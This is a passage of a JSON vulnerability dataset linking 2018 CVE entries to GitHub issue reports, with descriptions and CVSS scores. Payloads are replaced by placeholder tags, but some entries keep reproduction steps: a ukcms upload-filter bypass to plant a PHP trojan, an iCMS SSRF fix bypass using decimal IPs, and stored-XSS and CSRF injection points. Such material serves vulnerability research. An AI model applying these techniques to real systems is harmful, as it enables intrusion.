        "description": "There is a CSRF vulnerability that can be used to add a background administrator.. When the administrator lands, open it. APITAG APITAG APITAG APITAG APITAG '', '/') APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-14583",
        "Issue_Url_old": "https://github.com/maoGod/xyhcms/issues/1",
        "Issue_Url_new": "https://github.com/maogod/xyhcms/issues/1",
        "Repo_new": "maoGod/xyhcms",
        "Issue_Created_At": "2018-07-23T03:33:24Z",
        "description": "Xyhcms NUMBERTAG There is a CSRF vulnerability to add a background administrator. When the administrator lands, open it. APITAG CODETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-14584",
        "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/304",
        "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/304",
        "Repo_new": "axiomatic-systems/bento4",
        "Issue_Created_At": "2018-07-23T07:32:04Z",
        "description": "A heap buffer overflow has occurred when running program mp4info.. A heap buffer overflow has occurred when running program mp4info. ERRORTAG The testing program is mp4info. And the input file has been put at: FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-14587",
        "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/301",
        "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/301",
        "Repo_new": "axiomatic-systems/bento4",
        "Issue_Created_At": "2018-07-23T06:39:42Z",
        "description": "A global buffer overflow has occurred when running mp4info. A global buffer overflow has occurred when running ./mp4info ERRORTAG The testing program is mp4info. And the input file has been put at: FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-14588",
        "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/302",
        "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/302",
        "Repo_new": "axiomatic-systems/bento4",
        "Issue_Created_At": "2018-07-23T06:45:02Z",
        "description": "A SEGV signal occurred when running mp4info. A SEGV signal occurred when running mp4info. ERRORTAG The testing program is mp4info And the input file has been put at: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-14589",
        "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/303",
        "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/303",
        "Repo_new": "axiomatic-systems/bento4",
        "Issue_Created_At": "2018-07-23T07:02:34Z",
        "description": "A heap buffer overflow has occurred when running program mp4info. . A heap buffer overflow has occurred when running program mp4info. ERRORTAG he testing program is mp4info. And the input file has been put at: FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-14590",
        "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/305",
        "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/305",
        "Repo_new": "axiomatic-systems/bento4",
        "Issue_Created_At": "2018-07-23T07:35:12Z",
        "description": "A SEGV signal occurred when running mp4compact.. A SEGV signal occurred when running mp4compact. ERRORTAG The testing program is mp4compact. And the input file has been put at: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-14649",
        "Issue_Url_old": "https://github.com/ceph/ceph-iscsi-cli/issues/120",
        "Issue_Url_new": "https://github.com/ceph/ceph-iscsi-cli/issues/120",
        "Repo_new": "ceph/ceph-iscsi-cli",
        "Issue_Created_At": "2018-09-23T15:19:00Z",
        "description": "rbd target api.py exploited.. Hello, I've found that the python code was used to compromise our host remotely (in our case it was running as root so the attacker gained root privileges), the logs contains: CODETAG Hope this helps.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-14718",
        "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2097",
        "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2097",
        "Repo_new": "fasterxml/jackson-databind",
        "Issue_Created_At": "2018-07-27T05:58:22Z",
        "description": "CVE xxxx xxx: block another type from polymorphic deserialization. (note: placeholder for a CVE)",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-14730",
        "Issue_Url_old": "https://github.com/AgentME/browserify-hmr/issues/41",
        "Issue_Url_new": "https://github.com/macil/browserify-hmr/issues/41",
        "Repo_new": "macil/browserify-hmr",
        "Issue_Created_At": "2018-07-24T08:12:44Z",
        "description": "A vulnerability found in browserify hmr. Hi, I found a vulnerability in browserify hmr, how do I report it to you?",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-14731",
        "Issue_Url_old": "https://github.com/parcel-bundler/parcel/issues/1783",
        "Issue_Url_new": "https://github.com/parcel-bundler/parcel/issues/1783",
        "Repo_new": "parcel-bundler/parcel",
        "Issue_Created_At": "2018-07-24T08:11:12Z",
        "description": "A vulnerability found in parcel bundler. Hi, I found a vulnerability in parcel bundler, how do I report it to you?",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-14732",
        "Issue_Url_old": "https://github.com/webpack/webpack-dev-server/issues/1445",
        "Issue_Url_new": "https://github.com/webpack/webpack-dev-server/issues/1445",
        "Repo_new": "webpack/webpack-dev-server",
        "Issue_Created_At": "2018-07-24T08:09:59Z",
        "description": "A vulnerability found in webpack dev server. Hi, I found a vulnerability in webpack dev server, how do I report it to you?",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-14732",
        "Issue_Url_old": "https://github.com/webpack/webpack-dev-server/issues/1620",
        "Issue_Url_new": "https://github.com/webpack/webpack-dev-server/issues/1620",
        "Repo_new": "webpack/webpack-dev-server",
        "Issue_Created_At": "2019-01-07T17:51:38Z",
        "description": "Please backport CVETAG security fix to NUMBERTAG Operating System: n/a Node Version: n/a NPM Version: n/a webpack Version NUMBERTAG webpack dev server Version NUMBERTAG This is a bug [x] This is a modification request [ CVETAG ] describes a vulnerability in webpack dev APITAG by which attackers are able to steal developers\u2019 code. The vulnerability is classified as \u201cHIGH severity\u201d under the CVSS NUMBERTAG score. [A patch has been released][patch] and included in version NUMBERTAG However, version NUMBERTAG of the package requires APITAG , which entails significant breaking changes from Webpack NUMBERTAG and prior versions, as well as major version bumps to transitive peer dependencies, including APITAG . It is not trivial for users of the NUMBERTAG series to upgrade to a patched version of webpack dev server. As such, please backport the fix to version NUMBERTAG and release a new version, to protect the security of users who are unable to upgrade. Thank you for the hard work that you put into developing and maintaining this library. We appreciate it. [ CVETAG ]: URLTAG [patch]: URLTAG [comment]: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-14733",
        "Issue_Url_old": "https://github.com/OCA/server-tools/issues/1335",
        "Issue_Url_new": "https://github.com/oca/server-tools/issues/1335",
        "Repo_new": "oca/server-tools",
        "Issue_Created_At": "2018-08-08T07:56:44Z",
        "description": "SEC] OCA NUMBERTAG Denial of Service via APITAG . Security Advisory (OCA NUMBERTAG Denial of Service via APITAG Affects: Odoo NUMBERTAG servers: having APITAG module available in the addons path being directly accessible OR missing the expected configuration at the reverse proxy level (nginx) Credits : Nils Hamerlinck APITAG CVE ID : [ CVETAG CVETAG I. Background APITAG URLTAG module from OCA's APITAG repository URLTAG allows to take into account a specific HTTP header in the request ( APITAG or APITAG , depending on the version) to define the FILETAG applying to the instance. This is useful when you have one instance with multiple databases whose names don't match with the target domain names. II. Problem Description In a normal use case this HTTP header is set by the system administrator at the reverse proxy level (nginx); module is added to the APITAG config parameter and installed. But the module contains a APITAG directory, which had the unexpected effect URLTAG of trigerring its inconditional loading, even when not intended to be used: not added to the APITAG nor installed. III. Impact Attack Vector : Network exploitable Authentication : Not Required CVSS3 Score : High NUMBERTAG PATHTAG URLTAG So by just having it available in its addons path, the instance would load APITAG . An attacker could define a APITAG / APITAG header that would be evaluated as the db_filter regular expression URLTAG . By crafting a voluntarily inefficient regular expression, he could lead Odoo to APITAG (aka APITAG in threaded mode, with one request; in multi workers mode, with one request per worker (that would process until APITAG ). IV. Workaround If your Odoo server is accessible directly without any reverse proxy, there is no workaround. Note that using a reverse proxy is FILETAG for security but also performances reasons. If your Odoo server is running behind a reverse proxy, configure it at least to set the APITAG header to APITAG (or any relevant stricter regex for the concerned host): nginx: APITAG others: see here URLTAG V. Solution Update APITAG source code. If you intend to use this module in a deployment, make sure that: proxy mode is enabled in Odoo's configuration file: APITAG a APITAG header is properly defined at reverse proxy level module is added to APITAG VI. Correction details The following list contains the revisions after which the vulnerability is corrected NUMBERTAG URLTAG NUMBERTAG fa NUMBERTAG URLTAG NUMBERTAG e9bf URLTAG NUMBERTAG f5 URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-14736",
        "Issue_Url_old": "https://github.com/cloudwu/pbc/issues/123",
        "Issue_Url_new": "https://github.com/cloudwu/pbc/issues/123",
        "Repo_new": "cloudwu/pbc",
        "Issue_Created_At": "2018-07-24T06:48:42Z",
        "description": "A global buffer overflow issue has been detected. When I ran the program addressbook. ASAN found a global buffer overflow: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-14737",
        "Issue_Url_old": "https://github.com/cloudwu/pbc/issues/122",
        "Issue_Url_new": "https://github.com/cloudwu/pbc/issues/122",
        "Repo_new": "cloudwu/pbc",
        "Issue_Created_At": "2018-07-24T06:42:29Z",
        "description": "SEGV signal found when running program pbc. A SEGV signal occurred when running program pbc: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-14744",
        "Issue_Url_old": "https://github.com/cloudwu/pbc/issues/125",
        "Issue_Url_new": "https://github.com/cloudwu/pbc/issues/125",
        "Repo_new": "cloudwu/pbc",
        "Issue_Created_At": "2018-07-24T10:39:34Z",
        "description": "Heap use after free detected. When I ran the program pattern. A issue occurred, it's a heap use after free issue. Details: ERRORTAG The command line I used is just: ./pattern testcase. The testcase of this issue has been put at: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-14835",
        "Issue_Url_old": "https://github.com/intelliants/subrion/issues/760",
        "Issue_Url_new": "https://github.com/intelliants/subrion/issues/760",
        "Repo_new": "intelliants/subrion",
        "Issue_Created_At": "2018-07-14T04:40:46Z",
        "description": "Stored self XSS in APITAG member field tooltip\". There exists no escape when printing out tooltip under APITAG member\" ( URLTAG Steps to reproduce Navigate to Member field URLTAG Add a new field group or edit an existing one. Add the tooltip value as our XSS payload ERRORTAG Now navigate to URLTAG XSS payload would be trigerred. APITAG APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2018-14836",
        "Issue_Url_old": "https://github.com/intelliants/subrion/issues/762",
        "Issue_Url_new": "https://github.com/intelliants/subrion/issues/762",
        "Repo_new": "intelliants/subrion",
        "Issue_Created_At": "2018-07-14T18:10:11Z",
        "description": "Broken Authentication APITAG partial access to admin panel) . In the application, the administrator can create user groups & also apply security policies (permission) to it, application to all member of its group. One of the policies being user group permission to the \"admin panel\". Unfortunately, this doesn't work as expected. A normal user belonging to the Registered group ( No access to admin panel ), can still get inside the admin panel (but cant perform any action). Steps to reproduce NUMBERTAG Navigate to admin panel & enter credentials (registered user), user would be logged in NUMBERTAG Once he clicks on any links, would be quickly logged out of the application & would not be able to log in again. In order to reproduce again, log in from a valid user credential, having access to the admin panel & then logout. Now repeat NUMBERTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-14840",
        "Issue_Url_old": "https://github.com/intelliants/subrion/issues/773",
        "Issue_Url_new": "https://github.com/intelliants/subrion/issues/773",
        "Repo_new": "intelliants/subrion",
        "Issue_Created_At": "2018-08-01T07:56:36Z",
        "description": "Deny access for .html files in uploads folder.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-14858",
        "Issue_Url_old": "https://github.com/idreamsoft/iCMS/issues/33",
        "Issue_Url_new": "https://github.com/idreamsoft/icms/issues/33",
        "Repo_new": "idreamsoft/iCMS",
        "Issue_Created_At": "2018-08-02T04:33:24Z",
        "description": "iCMS NUMBERTAG SSRF vulnerability. >A SSRF vulnerability was discovered in iCMS NUMBERTAG here is a SSRF vulnerability that allows attackers to remotely construct malicious data to read server sensitive information. via the APITAG Notice This vulnerability is used in the right way APITAG of loophole repair is bypassed, or the flaw caused by imperfect repair. cause of loopholes The vulnerability is repaired by the URL protocol judgment before each HTTP request. Only HTTP, the URL of the HTTPS protocol is successfully requested, but the IP format URL is not limited, so the URLTAG or the IP decimal format of URL URLTAG NUMBERTAG can be used to obtain the service. Information of Intranet resources APITAG POC APITAG APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-14876",
        "Issue_Url_old": "https://github.com/FLIF-hub/FLIF/issues/520",
        "Issue_Url_new": "https://github.com/flif-hub/flif/issues/520",
        "Repo_new": "flif-hub/flif",
        "Issue_Created_At": "2018-07-25T07:00:06Z",
        "description": "FLIF aborted caused by longjmp causes uninitialized stack frame. Hello,guys,I use my company fuzzing tools .I found FLIF aborted.I think it caused by longjmp causes uninitialized stack frame.I search some information abort it. In google,the curl meet same situation.So I think it is a BUG. So,I want to show you more information about it.",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-14877",
        "Issue_Url_old": "https://github.com/alterebro/WeaselCMS/issues/5",
        "Issue_Url_new": "https://github.com/alterebro/weaselcms/issues/5",
        "Repo_new": "alterebro/weaselcms",
        "Issue_Created_At": "2018-07-31T02:13:05Z",
        "description": "There have XSS vulnerability that can excute javascript . There are NUMBERTAG SS vulnerabilities loading FILETAG log in and select \"SETTINGS\", Insert the payload APITAG APITAG >alert NUMBERTAG APITAG //\" in the Site APITAG APITAG APITAG Keywords and submit. open FILETAG line NUMBERTAG CODETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2018-14911",
        "Issue_Url_old": "https://github.com/yxcmf/ukcms/issues/1",
        "Issue_Url_new": "https://github.com/yxcmf/ukcms/issues/1",
        "Repo_new": "yxcmf/ukcms",
        "Issue_Created_At": "2018-08-01T01:39:58Z",
        "description": "ukcms NUMBERTAG and other Lower version ) has a APITAG vulnerability. Vulnerability description The CMS background content management editor has a file uploading vulnerability. By modifying the background file upload parameter: the APITAG upload file suffix\" section, you can bypass the restrictions on php file upload by cms, and then pass the Trojan horse and the getshell poc APITAG to the backstage as the admin NUMBERTAG add the value 'php' into 'upload_file_ext' which is a cms parameter use to limit upload APITAG use two 'php' to bypass limit eg: php,php) url: PATHTAG FILETAG FILETAG NUMBERTAG Go to any page editing section,choose the upload function. APITAG the suffix of a PHP Trojan to APITAG For pass the limit) Second,click the button to save the upload file APITAG BURPSUITE for packet capture and modification,modify the suffix to .php,add some arbitrarily string before the file APITAG pass the file head check),and then upload it! FILETAG FILETAG FILETAG FILETAG APITAG last step,connection the trojan FILETAG FILETAG Success!",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2018-14938",
        "Issue_Url_old": "https://github.com/simsong/tcpflow/issues/182",
        "Issue_Url_new": "https://github.com/simsong/tcpflow/issues/182",
        "Repo_new": "simsong/tcpflow",
        "Issue_Created_At": "2018-08-02T15:47:43Z",
        "description": "A integer overflow vulnerability in APITAG There is a overflow vulnerability in function APITAG while handle wifipacp's caplen. APITAG if the caplen NUMBERTAG we can cause a integer overflow vulnerability in function APITAG , which will result in a out of bounds read and may allow access to sensitive memory(or just a ddos). ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.1,
        "impactScore": 5.2,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-14940",
        "Issue_Url_old": "https://github.com/m0us3Sun/PHPCMS-v9/issues/1",
        "Issue_Url_new": "https://github.com/m0us3sun/phpcms-v9/issues/1",
        "Repo_new": "m0us3sun/phpcms-v9",
        "Issue_Created_At": "2018-07-23T04:07:15Z",
        "description": "PHPCMS NUMBERTAG PHPCMS APITAG \u6f0f\u6d1e\u5730\u5740\uff1a URLTAG \u627e\u5230\u5b58\u5728\u9a8c\u8bc1\u7801\u5904\uff0c\u5ba1\u67e5\u5143\u7d20\u627e\u5230\u9a8c\u8bc1\u7801\u94fe\u63a5\uff1a FILETAG \u7136\u540e\u6293\u5305\uff0c\u89c2\u5bdf\u9a8c\u8bc1\u7801\u957f\u3001\u5bbd\u53ef\u63a7\uff1a URLTAG FILETAG FILETAG \u4e0d\u65ad\u52a0\u5927\u957f\u5bbd\uff0c\u591a\u6b21\u53d1\u5305\uff0c\u53ef\u5bfc\u81f4\u62d2\u7edd\u670d\u52a1\u653b\u51fb\u3002 FILETAG FILETAG FILETAG APITAG \u4fee\u590d\uff1a \u5efa\u8bae\u914d\u7f6e\u56fe\u50cf\u9ed8\u8ba4\u53c2\u6570\uff0c\u662f\u53c2\u6570\u4e0d\u53ef\u63a7\u3002",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-14944",
        "Issue_Url_old": "https://github.com/thejinchao/jpeg_encoder/issues/4",
        "Issue_Url_new": "https://github.com/thejinchao/jpeg_encoder/issues/4",
        "Repo_new": "thejinchao/jpeg_encoder",
        "Issue_Created_At": "2018-07-23T02:20:36Z",
        "description": "SEGV in function APITAG I used Clang NUMBERTAG and APITAG to build jpeg encoder , this file URLTAG can cause SEGV in function APITAG when executing this command: APITAG This is the ASAN information: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-14945",
        "Issue_Url_old": "https://github.com/thejinchao/jpeg_encoder/issues/6",
        "Issue_Url_new": "https://github.com/thejinchao/jpeg_encoder/issues/6",
        "Repo_new": "thejinchao/jpeg_encoder",
        "Issue_Created_At": "2018-07-23T02:21:38Z",
        "description": "heap buffer overflow in function APITAG I used Clang NUMBERTAG and APITAG to build jpeg encoder , this file URLTAG can cause heap buffer overflow in function APITAG when executing this command: APITAG This is the ASAN information: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-14946",
        "Issue_Url_old": "https://github.com/flexpaper/pdf2json/issues/19",
        "Issue_Url_new": "https://github.com/flexpaper/pdf2json/issues/19",
        "Repo_new": "flexpaper/pdf2json",
        "Issue_Created_At": "2018-07-23T11:08:54Z",
        "description": "Alloc_dealloc_mismatch in function APITAG I use Clang NUMBERTAG and APITAG to build pdf2json NUMBERTAG this FILETAG can cause alloc dealloc mismatch with the following command: APITAG This is the ASAN information: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-14947",
        "Issue_Url_old": "https://github.com/flexpaper/pdf2json/issues/20",
        "Issue_Url_new": "https://github.com/flexpaper/pdf2json/issues/20",
        "Repo_new": "flexpaper/pdf2json",
        "Issue_Created_At": "2018-07-23T11:09:27Z",
        "description": "Alloc_dealloc_mismatch in function APITAG I use Clang NUMBERTAG and APITAG to build pdf2json NUMBERTAG this FILETAG can cause alloc dealloc mismatch with the following command: APITAG This is the ASAN information: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-14948",
        "Issue_Url_old": "https://github.com/dilawar/sound/issues/4",
        "Issue_Url_new": "https://github.com/dilawar/sound/issues/4",
        "Repo_new": "dilawar/sound",
        "Issue_Created_At": "2018-07-24T10:35:37Z",
        "description": "Alloc dealloc mismatch in function APITAG I used gcc NUMBERTAG and APITAG to build sound URLTAG , this file URLTAG can cause alloc dealloc mismatch when executing this command: APITAG This is the ASAN information: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-14958",
        "Issue_Url_old": "https://github.com/alterebro/WeaselCMS/issues/6",
        "Issue_Url_new": "https://github.com/alterebro/weaselcms/issues/6",
        "Repo_new": "alterebro/weaselcms",
        "Issue_Created_At": "2018-08-03T13:29:07Z",
        "description": "There are two CSRF vulnerabilities that can create new pages or update the website settings NUMBERTAG There is a CSRF vulnerabilitie that can create new pages via FILETAG ?b=pages&a=new poc: APITAG create a new page CODETAG APITAG is a CSRF vulnerabilitie that can update the website settings via index.php poc: APITAG update the website settings CODETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-15129",
        "Issue_Url_old": "https://github.com/thinksaas/ThinkSAAS/issues/16",
        "Issue_Url_new": "https://github.com/thinksaas/thinksaas/issues/16",
        "Repo_new": "thinksaas/thinksaas",
        "Issue_Created_At": "2018-08-07T05:29:05Z",
        "description": "\u5b58\u50a8\u578bxss\uff08\u9700\u8981\u6ce8\u518c\u767b\u5f55\uff09/ Storage type APITAG to register and log in\uff09. Storage type APITAG to register and log in\uff09 When the article is published: POST APITAG HTTP NUMBERTAG Host: APITAG Connection: close Content Length NUMBERTAG Cache Control: max age NUMBERTAG Origin: FILETAG Upgrade Insecure Requests NUMBERTAG User Agent: Content Type: application/x www form urlencoded Accept: PATHTAG / ;q NUMBERTAG Referer: URLTAG Accept Encoding: gzip, deflate Accept Language: zh CN,zh;q NUMBERTAG Cookie: APITAG APITAG APITAG Add an attack poc\uff1a APITAG APITAG to the NUMBERTAG Fp NUMBERTAG E after the content parameter Official return\uff1a URLTAG PATHTAG \u5b58\u50a8\u578bxss\uff08\u9700\u8981\u6ce8\u518c\u767b\u5f55\uff09 \u53d1\u8868\u6587\u7ae0\u65f6\uff1a POST APITAG HTTP NUMBERTAG Host: APITAG Connection: close Content Length NUMBERTAG Cache Control: max age NUMBERTAG Origin: FILETAG Upgrade Insecure Requests NUMBERTAG User Agent: Content Type: application/x www form urlencoded Accept: PATHTAG / ;q NUMBERTAG Referer: URLTAG Accept Encoding: gzip, deflate Accept Language: zh CN,zh;q NUMBERTAG Cookie: APITAG APITAG APITAG \u5728content NUMBERTAG Fp NUMBERTAG E\u6dfb\u52a0\u653b\u51fbpoc: APITAG APITAG \u5b98\u65b9\u590d\u73b0\uff1a URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2018-15130",
        "Issue_Url_old": "https://github.com/thinksaas/ThinkSAAS/issues/18",
        "Issue_Url_new": "https://github.com/thinksaas/thinksaas/issues/18",
        "Repo_new": "thinksaas/thinksaas",
        "Issue_Created_At": "2018-08-07T08:00:18Z",
        "description": "\u5b58\u50a8\u578bxss2\uff08\u9700\u8981\u6ce8\u518c\u767b\u5f55\uff09/ Storage type APITAG to register and log in\uff09. \u5f53\u6dfb\u52a0\u5c0f\u7ec4\u65f6\uff1a URLTAG When the group is added: URLTAG \u4fee\u6539\u5c0f\u7ec4\u4ecb\u7ecd\u65f6\uff1a When the revision of the panel: POST APITAG HTTP NUMBERTAG Host: APITAG Connection: close Content Length NUMBERTAG Cache Control: max age NUMBERTAG Origin: FILETAG Upgrade Insecure Requests NUMBERTAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG WOW NUMBERTAG APITAG (KHTML, like Gecko) APITAG Safari NUMBERTAG SE NUMBERTAG APITAG NUMBERTAG Content Type: multipart/form data; boundary= APITAG Accept: PATHTAG / ;q NUMBERTAG Referer: URLTAG Accept Encoding: gzip, deflate Accept Language: zh CN,zh;q NUMBERTAG Cookie: APITAG APITAG APITAG APITAG APITAG APITAG Content Disposition: form data; name=\"groupname\" name1 APITAG Content Disposition: form data; name=\"groupdesc\" describe1 APITAG APITAG Content Disposition: form data; name=\"photo\"; filename=\"\" Content Type: application/octet stream APITAG Content Disposition: form data; name=\"tag\" Label1 APITAG Content Disposition: form data; name=\"token\" APITAG APITAG \u5728groupdesc\u53c2\u6570\u7aef\u672a\u8fc7\u6ee4\u6076\u610f\u4ee3\u7801\uff0c\u9020\u6210\u6ce8\u5165\u3002 The malicious code is not filtered at the groupdesc parameter end, causing injection. POC\uff1a APITAG 